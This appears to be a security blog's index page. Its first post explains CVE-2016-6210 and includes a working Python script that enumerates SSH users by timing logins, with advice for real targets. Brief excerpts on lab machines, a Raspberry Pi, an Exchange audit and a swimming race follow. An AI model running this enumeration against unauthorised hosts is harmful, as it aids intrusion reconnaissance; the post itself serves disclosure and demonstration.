CVE-2016-6210 OpenSSHD user enumeration

On the 13th of July a new CVE appeared in the wild (yes, Pokémon Go is still the buzz for the moment).

CVE-2016-6210 allows user enumeration on an SSH server by comparing the response time of a password-authentication attempt for a non-existing user with that for an existing one. When a very long password is sent, sshd takes measurably longer to reject an existing user, because that user's real password hash (typically SHA-256 or SHA-512 crypt) is computed over the whole password, whereas an unknown user gets a fixed Blowfish hash of a static password that does not scale with its length. This vulnerability targets OpenSSH sshd version 7.2p2 or earlier (it is fixed in 7.3).

That means that with a good username wordlist you can find out which users exist on the server with SSH access.

This post just demonstrates how to exploit this vulnerability with a simple example.
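The timing comparison described above, written out as an added example (this is not the post's own script). It measures several attempts per username, builds a baseline from random usernames that almost certainly do not exist, and flags a candidate as present when its median timing clearly exceeds that baseline. The `make_simulated_probe` stand-in uses constructed timings so the logic runs offline; `make_ssh_probe` shows how the same probe would be driven against a real host with paramiko (assumed installed) and is not exercised here. The password length, the 1.5 ratio and the sample counts are assumptions to tune per target.

```python
import random
import statistics
import time
from typing import Callable, Dict, Iterable, Optional

# A long password makes the hashing time dominate the round trip. On a vulnerable
# sshd, an existing user's SHA-256/SHA-512 crypt hash is computed over all of it,
# while an unknown user gets a fixed Blowfish hash that does not scale with length.
# The 25000 length is an assumption; larger values widen the gap.
LONG_PASSWORD = "A" * 25000

# A probe takes a username and returns the seconds one password attempt took.
Probe = Callable[[str], float]


def median_timing(probe: Probe, user: str, samples: int) -> float:
    """Median of several attempts, to damp network jitter and outliers."""
    return statistics.median(probe(user) for _ in range(samples))


def enumerate_users(probe: Probe, candidates: Iterable[str], samples: int = 5,
                    baseline_count: int = 5, ratio: float = 1.5,
                    seed: Optional[int] = None) -> Dict[str, bool]:
    """Classify each candidate as existing (True) or not (False).

    The baseline is the median timing of random usernames that almost certainly
    do not exist on the target; a candidate whose own median exceeds the
    baseline by `ratio` is reported as present.
    """
    rng = random.Random(seed)
    baseline = [
        median_timing(probe, "nonexistent%08x" % rng.getrandbits(32), samples)
        for _ in range(baseline_count)
    ]
    threshold = statistics.median(baseline) * ratio
    return {user: median_timing(probe, user, samples) > threshold for user in candidates}


def make_simulated_probe(existing_users: Iterable[str], seed: int = 1) -> Probe:
    """Offline stand-in for a vulnerable server. The timings are constructed, not
    captured: ~50 ms of handshake plus ~120 ms of crypt work for real users."""
    existing = set(existing_users)
    rng = random.Random(seed)

    def probe(user: str) -> float:
        elapsed = 0.050 + rng.uniform(-0.005, 0.005)
        if user in existing:
            elapsed += 0.120 + rng.uniform(0.0, 0.010)
        return elapsed

    return probe


def make_ssh_probe(host: str, port: int = 22, timeout: float = 10.0) -> Probe:
    """Probe a real server with paramiko (assumed installed; only against hosts
    you are authorised to test). Not used by the offline demo below."""
    import paramiko  # imported lazily so the offline demo has no dependency

    def probe(user: str) -> float:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        start = time.perf_counter()
        try:
            client.connect(host, port=port, username=user, password=LONG_PASSWORD,
                           look_for_keys=False, allow_agent=False, timeout=timeout)
        except paramiko.AuthenticationException:
            pass  # the password is wrong by design; only the delay matters
        finally:
            client.close()
        return time.perf_counter() - start

    return probe


if __name__ == "__main__":
    demo = make_simulated_probe({"root", "www-data"})
    for user, present in enumerate_users(demo, ["root", "www-data", "alice"], seed=0).items():
        print(f"{user:10s} {'exists' if present else 'absent'}")
```

Two caveats when running this against a real target: the gap only shows if password authentication is enabled and the existing users' hashes are SHA-256/SHA-512 crypt (a Blowfish-hashed account looks like a non-existent one), and each attempt is a full SSH connection, so `MaxStartups`, fail2ban-style rate limiting and network jitter all argue for more samples per name rather than a tighter ratio.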

Vulnhub Droopy

Droopy homepage

A few days ago, I installed a new pentesting box based on Arch Linux with Kali in a virtual machine. In order to test it I selected a light vulnbox on vulnhub: Droopy. There were two hints in the description of the machine on the vulnhub download page:

  1. Grab a copy of the rockyou wordlist.
  2. It's fun to read other people's email.

We will see how to use them in a moment :)

Installing OSMC without installer

I bought the new Raspberry Pi 3 with integrated Wi-Fi. Currently I still have an Ethernet cable running through my living room to my old Raspberry Pi 1.

Just wanting to download the latest raspbmc version, I found out that it is no longer raspbmc but OSMC, which is basically the same but with much more marketing around it. The most annoying part is that you need to install an installer (such meta). I was pretty sure it was not really necessary, and moreover there is no version of the installer for Arch Linux.

Vulnhub - FlickII

FlickII

Still playing with the vulnhub machines, this time it is the turn of FlickII. This one is different from the others as it has an Android application associated with it. It is a great exercise to play with a mobile application, decompile it and see what is inside.

Auditing Exchange Server

ExchangeAnalyser

Recently I performed an MS Exchange configuration review. For the "old" versions of Exchange we can use the Microsoft Exchange Best Practices Analyzer. For the new versions of MS Exchange (2013 and 2016) the tool must be downloaded from the Office 365 marketplace, but most MS Exchange servers are not directly connected to the internet. That is why I used a tool developed by Paul Cunningham: Exchange Analyzer, available on GitHub.

12 Hours swimming

swimming 3

No code this time: this article is about sport and recounts a swimming competition. My town organizes each year a swim competition called "Les 12 heures de natation", meaning "The 12 hours of swimming".

The principle is quite simple: you just swim for as long as you can without a "long" stop (you can stop to drink, eat a bit and go to the toilet).

I took part in this competition on 30 May.